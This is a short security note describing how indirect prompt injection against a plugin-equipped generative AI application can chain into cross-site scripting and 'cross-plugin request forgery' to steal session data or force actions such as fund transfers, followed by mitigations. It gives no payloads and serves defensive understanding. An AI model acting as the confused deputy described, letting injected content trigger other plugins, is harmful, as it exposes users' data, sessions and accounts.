Fraudulent Scam By Unknown Remote Attacker
Created: 2023-12-23 16:51
#note
The breach:Â Indirect prompt injection can lead to cross-site scripting (XSS 1) and cross-plugin request forgery (CPRF 2), which are two separate, but close-knit vulnerabilities. Together, they can be used to impact end user behavior.
The impact: XSS is a vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. This occurs when an attacker can place harmful code into a web application's input field (like a comment box). If the application doesn't properly check this input, it will include the malicious script in the content it displays. When other users visit the affected page, their browsers will run the script, which can do various harmful things, like stealing their data or taking over their session on the website. For example, consider a generative AI consumer application that incorporates several plugins. If this application’s underlying model is vulnerable to a confused deputy attack, it might activate another plugin. The attacker's script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Combined with a successful CPRF attack, it can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the user is an administrative account, CPRF can compromise the entire web application.
The mitigation: Both XSS and CPRF are significant security threats in web applications, and they require several mitigation strategies. XSS is mainly about untrusted data being sent to a web browser without proper validation or escaping, while CPRF involves tricking a user's browser into performing actions on a trusted website without the user's knowledge. Both of these scenarios can benefit from commonly-used mitigation techniques, including human-in-the-loop design, so one plugin cannot invoke another, and tailor permissions for sensitive information.